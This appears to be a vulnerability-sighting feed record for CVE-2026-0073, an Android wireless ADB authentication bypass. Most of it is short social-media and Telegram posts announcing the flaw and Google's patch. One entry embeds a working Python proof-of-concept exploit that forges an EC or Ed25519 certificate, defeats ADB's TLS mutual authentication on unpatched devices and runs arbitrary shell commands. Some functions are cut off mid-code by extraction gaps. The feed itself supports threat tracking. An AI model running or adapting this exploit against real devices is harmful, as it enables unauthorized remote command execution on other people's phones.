{"vulnerability": "CVE-2026-0073", "sightings": [{"uuid": "2d761bc5-d78b-46d1-b8be-69a6fe7756cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3ml2d26f5kc2e", "content": "CVE-2026-0073 - Qualcomm ADB TLS Certificate Bypass Vulnerability\nCVE ID : CVE-2026-0073\n \n Published : May 4, 2026, 6 p.m. | 20\u00a0minutes ago\n \n Description : In adbd_tls_verify_cert of auth.cpp, there is a possible bypass of wireless ADB mutual authentication due to a logic er...", "creation_timestamp": "2026-05-04T18:39:31.259417Z"}, {"uuid": "eaa653c5-54fc-4d55-9a10-1f42d338328c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3ml2hl2mb3f2f", "content": "\ud83d\udfe0 CVE-2026-0073 - High (8.8)\n\nIn adbd_tls_verify_cert of auth.cpp, there is a possible bypass of wireless ADB mutual authentica...\n\nhttps://www.thehackerwire.com/vulnerability/CVE-2026-0073/\n\n#infosec #cybersecurity #CVE #vulnerability #security #patchstack", "creation_timestamp": "2026-05-04T20:00:33.792077Z"}, {"uuid": "f7c8a9ee-1e93-4961-b254-db9a8b65e390", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/116518282534275711", "content": "The severity is increased for this new vulnerability affecting Google Android (CVE-2026-0073) https://vuldb.com/vuln/361009", "creation_timestamp": "2026-05-04T20:51:45.689886Z"}, {"uuid": "4479cd48-f09b-46bf-9c2c-cc3d01aa14a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://infosec.exchange/users/jbhall56/statuses/116522111956035434", "content": "CVE-2026-0073 affects Android\u2019s System component and it can be exploited without any user interaction. https://www.securityweek.com/critical-remote-code-execution-vulnerability-patched-in-android-2/", "creation_timestamp": "2026-05-05T13:05:28.258767Z"}, {"uuid": "445b217c-5848-4c6c-8aeb-9e3d32c8c022", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/jbhall56.bsky.social/post/3ml4atwxe4s25", "content": "CVE-2026-0073 affects Android\u2019s System component and it can be exploited without any user interaction. www.securityweek.com/critical-rem...", "creation_timestamp": "2026-05-05T13:05:35.075322Z"}, {"uuid": "0e17e705-eff1-4f4e-8379-85ebdc89543c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/postac001.bsky.social/post/3ml4c6p6e372t", "content": "Android\u306eSystem\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u306b\u3001\u30e6\u30fc\u30b6\u30fc\u64cd\u4f5c\u306a\u3057\u3067\u60aa\u7528\u53ef\u80fd\u306a\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u306e\u8106\u5f31\u6027\uff08CVE-2026-0073\uff09\u304c\u767a\u898b\u3055\u308c\u3001\u4fee\u6b63\u3055\u308c\u307e\u3057\u305f\u3002", "creation_timestamp": "2026-05-05T13:29:29.741075Z"}, {"uuid": "1d6e67c8-de2b-4828-a865-bb707b5b9969", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3ml4fu2vvfa2b", "content": "\ud83d\udd17 CVE : CVE-2026-0073", "creation_timestamp": "2026-05-05T14:35:07.113077Z"}, {"uuid": "06520c2e-88de-415b-8eef-8bdbabcb8d7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/undercodenews.bsky.social/post/3ml4gagk4li2t", "content": "Android Security Patch Release: Critical RCE Flaw CVE-2026-0073 Raises Silent Threat\u00a0Concerns\n\n\ud83d\udd0d Introduction: A Quiet Fix for a Potentially Loud Disaster In the ever-evolving landscape of mobile security, even a single unnoticed flaw can open the door to massive compromise. Google has once again\u2026", "creation_timestamp": "2026-05-05T14:42:02.805879Z"}, {"uuid": "7a9983e0-d3db-4e05-b790-df32e1154719", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3ml4ggewofx2t", "content": "Google patches a critical remote code execution flaw (CVE-2026-0073) in Android\u2019s adbd. Exploitation requires no user interaction. No Wear OS, Pixel Watch, or Android Automotive fixes yet. #AndroidSecurity #RemoteCodeExec #USA", "creation_timestamp": "2026-05-05T14:45:22.636709Z"}, {"uuid": "bcad6605-3326-4b26-9bb7-3f6403a2bcf4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml4iudkubf2m", "content": "Critical Android vulnerability CVE-2026-0073 fixed by Google", "creation_timestamp": "2026-05-05T15:28:57.060023Z"}, {"uuid": "f41620bb-da55-4255-b501-c80191394429", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/116522838360570862", "content": "Some increased actor activities are shown targeting Google Android (CVE-2026-0073) https://vuldb.com/vuln/361009/cti", "creation_timestamp": "2026-05-05T16:10:12.012911Z"}, {"uuid": "46206d26-e4a3-43b0-87a5-5ccfb9e8f231", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "Telegram/XZpFzp1tLxb0JAzIly4ZQNsMoyXo5KgbjxF1IP2XV0BRGKA9", "content": "", "creation_timestamp": "2026-05-05T15:10:05.000000Z"}, {"uuid": "e6ba7957-9be7-4f83-aa75-bf03c9903bad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://t.me/ctinow/249779", "content": "Critical Android vulnerability CVE-2026-0073 fixed by Google\nhttps://ift.tt/3mpTQux", "creation_timestamp": "2026-05-05T15:09:24.000000Z"}, {"uuid": "98666222-508e-4f53-a7c1-e16114b04e37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/Android.activitypub.awakari.com.ap.brid.gy/post/3ml4p26o7kxb2", "content": "CVE-2026-0073: Zero-Click RCE Flaw in Android's Wireless ADB Bypasses Authentication CVE-2026-0073: Zero-Click RCE Flaw in Android's Wireless ADB Bypasses Authentication \u26a0 Critical \u2014 Ze...\n\n#Vulnerabilities\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-05T17:19:38.203260Z"}, {"uuid": "f81b406e-ae83-4a4a-b317-d70007ca1a02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/Android.activitypub.awakari.com.ap.brid.gy/post/3ml4qr6eau662", "content": "Critical Android vulnerability CVE-2026-0073 fixed by Google Google patched a critical Android flaw (CVE\u20112026\u20110073) that lets attackers run code remotely without user action. Google released a ...\n\n#Breaking #News #Mobile #Security #Android #CVE-2026-0073 #Google #Hacking #hacking #news [\u2026]", "creation_timestamp": "2026-05-05T17:50:31.671710Z"}, {"uuid": "f75fe7f8-3e1f-4aab-8220-f5e77dd28bc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/sonoclaudio.ransomnews.online/post/3ml4wz6ijmk25", "content": "\ud83d\udce2 Fratelli di #Pixel ... aggiornare! \nBollettino sulla sicurezza #Android Maggio 2026:\n\ud83d\udd17 source.android.com/docs/securit...\nNota sulla vulnerabilit\u00e0 CVE-2026-0073:\n\ud83d\udd17 cybersecuritynews.com/android-zero...", "creation_timestamp": "2026-05-05T19:42:16.167757Z"}, {"uuid": "a7d80d52-41d7-4f8b-af5a-e0d6882ed9ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3ml4y3u7eud2k", "content": "CVE-2026-0073: Zero-Click Exploit Bypasses Android\u2019s Core Security \u2013 Your Device Is at Risk +\u00a0Video\n\nIntroduction A newly disclosed critical vulnerability in Android\u2019s System component, tracked as CVE\u20112026\u20110073, allows remote attackers to execute arbitrary code as the `shell` user without any user\u2026", "creation_timestamp": "2026-05-05T20:01:36.026887Z"}, {"uuid": "a6de2662-feda-406a-b4e4-93407131e92a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml53ovl2kj2g", "content": "Critical CVE-2026-0073 \u2014 Android ADB Wireless Authentication Bypass RCE", "creation_timestamp": "2026-05-05T21:05:56.168415Z"}, {"uuid": "8c5805c1-a2c8-4bec-a0c6-53619eafc167", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://t.me/GithubRedTeam/82967", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-0073-Android-adbd-authentication-bypass-POC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a SecTestAnnaQuinn\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-05 21:57:28\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-05T22:00:05.000000Z"}, {"uuid": "f521b879-dba0-455d-b508-12a8368bfe28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://infosec.exchange/users/jbhall56/statuses/116527812086931769", "content": "CVE-2026-0073 affects Android\u2019s System component and it can be exploited without any user interaction. https://www.securityweek.com/critical-remote-code-execution-vulnerability-patched-in-android-2/", "creation_timestamp": "2026-05-06T13:15:05.017725Z"}, {"uuid": "27f08216-0ace-4581-9abf-8059bbc8503c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/jbhall56.bsky.social/post/3ml6ru3763c2y", "content": "CVE-2026-0073 affects Android\u2019s System component and it can be exploited without any user interaction. www.securityweek.com/critical-rem...", "creation_timestamp": "2026-05-06T13:15:14.936423Z"}, {"uuid": "d3fc0178-b472-4a41-9da0-aee9483ca83d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3ml6unzdvpk2g", "content": "Critical Android vulnerability CVE-2026-0073 fixed by Google\n\nGoogle patched a critical Android flaw (CVE\u20112026\u20110073) that lets attackers run code remotely without user action. Google released a security update for Android to address a critical remote code execution flaw, tracked a\u2026\n#hackernews #news", "creation_timestamp": "2026-05-06T14:05:29.864344Z"}, {"uuid": "c038fd18-dafa-4b70-adc2-595d37b14a14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://gist.github.com/adityatelange/cbf0f58109042a653c022faff3cc5ccd", "content": "#!/usr/bin/env python3\n\"\"\"\nCVE-2026-0073 - ADB Wireless Mutual Authentication Bypass PoC\n\nVulnerability: Logic error in adbd_tls_verify_cert (auth.cpp)\n EVP_PKEY_cmp return value is used in a boolean context.\n Returns -1 for key type mismatch, which evaluates as truthy,\n causing adbd to grant authentication to any client presenting\n a non-RSA certificate (e.g., EC key).\n\nAffected: Android devices with wireless ADB enabled (pre-May 2026 ASB patch)\nImpact: Remote (proximal/adjacent) code execution as shell user\n\nRequirements:\n pip install cryptography\n\nADB TLS connection flow (Android 11+):\n 1. Plain TCP connection\n 2. Plain CNXN exchange (client advertises \"tls_auth\" feature)\n 3. A_STLS exchange (both sides signal TLS upgrade)\n 4. TLS handshake (adbd calls adbd_tls_verify_cert on client cert)\n 5. Server CNXN arrives (over TLS, auth complete)\n 6. Client opens service stream (shell/exec)\n\nUsage:\n python3 poc.py [port] [command] [key_type] [--verbose]\n\nExample:\n python3 poc.py 192.168.1.100 5555 id ec --verbose\n\"\"\"\n\nimport os\nimport sys\nimport socket\nimport ssl\nimport struct\nimport tempfile\nimport datetime\n\ntry:\n from cryptography import x509\n from cryptography.x509.oid import NameOID\n from cryptography.hazmat.primitives import hashes, serialization\n from cryptography.hazmat.primitives.asymmetric import ec, ed25519\nexcept ImportError:\n print(\"[-] Missing dependency: pip install cryptography\")\n sys.exit(1)\n\n# \u2500\u2500 ADB protocol constants \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nADB_VERSION = 0x01000001\nADB_MAX_DATA = 1024 * 1024\nA_CNXN = 0x4E584E43\n# A_OPEN must be 0x4E45504F (\"OPEN\" in little-endian u32 form)\nA_OPEN = 0x4E45504F\nA_OKAY = 0x59414B4F\nA_CLSE = 0x45534C43\nA_WRTE = 0x45545257\nA_STLS = 0x534C5453 # Start-TLS upgrade\n\n# TLS version constants used in A_STLS arg0\nADB_TLS_VERSION_MIN = 0x01000000\nINITIAL_DELAYED_ACK_BYTES = 32 * 1024 * 1024\nADB_FEATURE_DELAYED_ACK = \"delayed_ack\"\n\n# Advertise tls_auth so adbd knows we support the STLS upgrade (pre-TLS only)\nADB_FEATURES_PLAIN = (\n b\"host::features=shell_v2,cmd,stat_v2,ls_v2,fixed_push_mkdir,apex,abb,\"\n b\"fixed_push_symlink_timestamp,abb_exec,remount_shell,track_app,\"\n b\"sendrecv_v2,sendrecv_v2_brotli,sendrecv_v2_lz4,sendrecv_v2_zstd,\"\n b\"sendrecv_v2_dry_run_send,openscreen_mdns,tls_auth\\x00\"\n)\n\n# \u2500\u2500 Certificate generation \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\n# Key types that trigger non-zero (non-match) returns from EVP_PKEY_cmp:\n# ec \u2192 EVP_PKEY_cmp returns -1 (different key type)\n# ed25519 \u2192 EVP_PKEY_cmp returns -2 (operation not supported by BoringSSL)\n# Both are non-zero and therefore truthy in the buggy if-condition.\nKEY_TYPES = [\"ec\", \"ed25519\"]\n\n\ndef generate_bypass_cert(key_type: str = \"ec\"):\n \"\"\"\n Generate a self-signed TLS certificate with a non-RSA key.\n\n - ec : EVP_PKEY_cmp(rsa, ec) \u2192 -1 (type mismatch) \u2192 truthy\n - ed25519 : EVP_PKEY_cmp(rsa, ed25519) \u2192 -2 (unsupported operation) \u2192 truthy\n\n Both values are non-zero and bypass the buggy:\n if (EVP_PKEY_cmp(known_evp.get(), evp_pkey.get()))\n \"\"\"\n if key_type == \"ed25519\":\n key = ed25519.Ed25519PrivateKey.generate()\n sign_alg = None # Ed25519 uses no separate hash\n else:\n key = ec.generate_private_key(ec.SECP256R1())\n sign_alg = hashes.SHA256()\n\n name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, \"adbkey\")])\n builder = (\n x509.CertificateBuilder()\n .subject_name(name)\n .issuer_name(name)\n .public_key(key.public_key())\n .serial_number(x509.random_serial_number())\n .not_valid_before(datetime.datetime.utcnow())\n .not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=365))\n )\n cert = builder.sign(key, sign_alg)\n return key, cert\n\n\n# \u2500\u2500 ADB protocol helpers \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef _crc32(data: bytes) -> int:\n return sum(data) & 0xFFFFFFFF\n\n\ndef pack_message(cmd: int, arg0: int, arg1: int, data: bytes = b\"\") -> bytes:\n magic = cmd ^ 0xFFFFFFFF\n header = struct.pack(\n \" dict | None:\n \"\"\"Read one complete ADB message (24-byte header + payload).\"\"\"\n raw = b\"\"\n while len(raw) < 24:\n chunk = sock.recv(24 - len(raw))\n if not chunk:\n return None\n raw += chunk\n\n cmd, arg0, arg1, data_len, _, _ = struct.unpack(\" str:\n return _CMD_NAMES.get(cmd, hex(cmd))\n\n\ndef parse_feature_set(banner_data: bytes) -> set[str]:\n \"\"\"Extract feature list from a CNXN banner payload.\"\"\"\n banner = banner_data.decode(errors=\"replace\").strip(\"\\x00\")\n for part in banner.split(\";\"):\n if part.startswith(\"features=\"):\n return {f for f in part[len(\"features=\"):].split(\",\") if f}\n return set()\n\n\n# \u2500\u2500 Exploit \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\n# TLS alert 46 = certificate_unknown\n_SSL_ALERT_CERTIFICATE_UNKNOWN = 46\n\ndef _handle_ssl_error(exc: ssl.SSLError) -> None:\n reason = str(exc)\n if \"CERTIFICATE_UNKNOWN\" in reason or f\"alert {_SSL_ALERT_CERTIFICATE_UNKNOWN}\" in reason:\n print(\"[-] adbd sent certificate_unknown alert \u2014 authentication was denied.\")\n print()\n print(\" Two possible causes:\")\n print()\n print(\" 1. PATCHED (most likely if `adb devices` shows the device):\")\n print(\" The May 2026 ASB fix changes the condition from\")\n print(\" if (EVP_PKEY_cmp(...)) // buggy: -1 is truthy\")\n print(\" to\")\n print(\" if (EVP_PKEY_cmp(...) == 1) // fixed: only exact match\")\n print(\" so EVP_PKEY_cmp returning -1 (type mismatch) no longer bypasses auth.\")\n print(\" Verify with: adb shell getprop ro.build.version.security_patch\")\n print(\" Vulnerable builds have a patch level before 2026-05-01.\")\n print()\n print(\" 2. NO STORED RSA KEYS (if device was never paired):\")\n print(\" IteratePublicKeys() has nothing to iterate \u2014 the buggy\")\n print(\" EVP_PKEY_cmp path is never reached \u2014 authorized stays false.\")\n print(\" The device must have \u22651 previously authorized RSA key in\")\n print(\" /data/misc/adb/adb_keys for the vulnerability to be triggered.\")\n else:\n print(f\"[-] SSL error: {exc}\")\n\n\ndef _make_ssl_context(cert_path: str, key_path: str) -> ssl.SSLContext:\n ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n ctx.load_cert_chain(certfile=cert_path, keyfile=key_path)\n # adbd requires TLS 1.3; allow 1.2 as fallback for older builds\n ctx.minimum_version = ssl.TLSVersion.TLSv1_2\n return ctx\n\n\ndef exploit(target_ip: str, target_port: int = 5555, command: str = \"id\",\n key_type: str = \"ec\", verbose: bool = False) -> bool:\n def dbg(message: str) -> None:\n if verbose:\n print(message)\n\n print(\"=\" * 60)\n print(\" CVE-2026-0073 - ADB Wireless Auth Bypass PoC\")\n print(\"=\" * 60)\n print(f\"[*] Target : {target_ip}:{target_port}\")\n print(f\"[*] Command : {command}\")\n print(f\"[*] Key type : {key_type}\")\n print()\n\n # 1. Generate malicious certificate with a non-RSA key\n print(f\"[*] Generating {key_type} self-signed certificate ...\")\n key, cert = generate_bypass_cert(key_type)\n\n cert_pem = cert.public_bytes(serialization.Encoding.PEM)\n key_pem = key.private_bytes(\n serialization.Encoding.PEM,\n serialization.PrivateFormat.TraditionalOpenSSL,\n serialization.NoEncryption(),\n )\n\n cert_tmp = tempfile.NamedTemporaryFile(delete=False, suffix=\".pem\")\n key_tmp = tempfile.NamedTemporaryFile(delete=False, suffix=\".pem\")\n try:\n cert_tmp.write(cert_pem); cert_tmp.close()\n key_tmp.write(key_pem); key_tmp.close()\n\n expected_ret = \"-2 (unsupported)\" if key_type == \"ed25519\" else \"-1 (type mismatch)\"\n print(f\"[+] Certificate ready \u2014 {key_type} key will cause EVP_PKEY_cmp to return {expected_ret}\")\n print(f\"[*] adbd evaluates {expected_ret.split()[0]} as truthy \u2192 authorized = true\")\n print()\n\n # \u2500\u2500 Step 1: Plain TCP connection \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n print(\"[*] Connecting (plain TCP) ...\")\n raw_sock = socket.create_connection((target_ip, target_port), timeout=10)\n raw_sock.settimeout(10)\n\n # \u2500\u2500 Step 2: Client sends CNXN; server replies with A_STLS \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n # adbd does NOT send its own CNXN before STLS \u2014 it responds to the\n # client's CNXN with A_STLS to initiate the TLS upgrade immediately.\n print(\"[*] Sending plain CNXN (advertising tls_auth feature) ...\")\n raw_sock.sendall(pack_message(A_CNXN, ADB_VERSION, ADB_MAX_DATA, ADB_FEATURES_PLAIN))\n\n msg = recv_message(raw_sock)\n if msg is None:\n print(\"[-] No response to CNXN\")\n return False\n\n if msg[\"cmd\"] == A_CNXN:\n # Some builds do send CNXN first; consume it and wait for STLS\n server_banner = msg[\"data\"].decode(errors=\"replace\").strip(\"\\x00\")\n print(f\"[+] Server CNXN: {server_banner[:100]}\")\n if b\"tls_auth\" not in msg[\"data\"]:\n print(\"[-] Server does not advertise tls_auth \u2014 device may be already patched\")\n return False\n msg = recv_message(raw_sock)\n\n if msg is None or msg[\"cmd\"] != A_STLS:\n got = cmd_name(msg[\"cmd\"]) if msg else \"none\"\n print(f\"[-] Expected STLS from server, got {got}\")\n return False\n\n print(f\"[+] Server requests STLS (min TLS version: {hex(msg['arg0'])})\")\n\n # \u2500\u2500 Step 3: Client sends A_STLS back to confirm upgrade \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n print(\"[*] Sending A_STLS back to confirm upgrade ...\")\n raw_sock.sendall(pack_message(A_STLS, ADB_TLS_VERSION_MIN, 0))\n\n # \u2500\u2500 Step 4: TLS handshake with non-RSA certificate \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n print(\"[*] Performing TLS handshake with non-RSA certificate ...\")\n ssl_ctx = _make_ssl_context(cert_tmp.name, key_tmp.name)\n tls_sock = ssl_ctx.wrap_socket(raw_sock, server_side=False,\n server_hostname=target_ip,\n do_handshake_on_connect=False)\n try:\n tls_sock.do_handshake()\n except ssl.SSLError as e:\n _handle_ssl_error(e)\n return False\n\n cipher = tls_sock.cipher()\n print(f\"[+] TLS handshake accepted \u2014 mutual authentication bypassed!\")\n print(f\" Cipher: {cipher[0]} Protocol: {cipher[1]}\")\n print()\n\n # \u2500\u2500 Step 5: Wait for server CNXN over TLS \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n # Important: do NOT send another client CNXN here. On adbd transports\n # with use_tls=true, every received CNXN triggers a new STLS request.\n local_id = 1\n print(\"[*] Waiting for server post-TLS CNXN ...\")\n msg = recv_message(tls_sock)\n if msg is None or msg[\"cmd\"] != A_CNXN:\n print(f\"[-] Expected server CNXN over TLS, got {cmd_name(msg['cmd']) if msg else 'none'}\")\n return False\n\n banner = msg[\"data\"].decode(errors=\"replace\").strip(\"\\x00\")\n server_features = parse_feature_set(msg[\"data\"])\n delayed_ack_enabled = ADB_FEATURE_DELAYED_ACK in server_features\n print(f\"[+] Server identity: {banner[:100]}\")\n print(\"[+] Authenticated \u2014 command channel ready\")\n dbg(f\"[*] Server features: {sorted(server_features)}\")\n dbg(f\"[*] delayed_ack enabled: {delayed_ack_enabled}\")\n print()\n\n # \u2500\u2500 Step 6: Open command stream \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n # Try shell first, then exec as a fallback for builds with different\n # service wiring.\n service_candidates = [\n f\"shell:{command}\\x00\".encode(),\n f\"exec:{command}\\x00\".encode(),\n ]\n\n remote_id = None\n tls_sock.settimeout(10)\n for payload in service_candidates:\n service_name = payload.decode(errors=\"ignore\").rstrip(\"\\x00\")\n print(f\"[*] Opening service: {service_name!r}\")\n open_send_bytes = INITIAL_DELAYED_ACK_BYTES if delayed_ack_enabled else 0\n tls_sock.sendall(pack_message(A_OPEN, local_id, open_send_bytes, payload))\n\n while True:\n msg = recv_message(tls_sock)\n if msg is None:\n print(\"[-] Connection closed waiting for OPEN response\")\n return False\n dbg(f\"[*] After OPEN, received: {cmd_name(msg['cmd'])} arg0={msg['arg0']} data={msg['data'][:32]!r}\")\n\n if msg[\"cmd\"] == A_OKAY:\n remote_id = msg[\"arg0\"]\n okay_payload = b\"\"\n if delayed_ack_enabled:\n okay_payload = struct.pack(\" [port] [command] [key_type] [--verbose]\")\n print(f\" target_ip IP of the Android device\")\n print(f\" port ADB port (default: 5555)\")\n print(f\" command Shell command to run (default: id)\")\n print(f\" key_type Certificate key type: ec or ed25519 (default: ec)\")\n print(f\" ec \u2192 EVP_PKEY_cmp returns -1 (type mismatch)\")\n print(f\" ed25519 \u2192 EVP_PKEY_cmp returns -2 (unsupported op)\")\n print(f\" --verbose Enable protocol debug logs\")\n sys.exit(1)\n\n ip = args[0]\n port = int(args[1]) if len(args) > 1 else 5555\n cmd = args[2] if len(args) > 2 else \"id\"\n key_type = args[3] if len(args) > 3 else \"ec\"\n\n if key_type not in KEY_TYPES:\n print(f\"[-] Unknown key type {key_type!r}. Choose from: 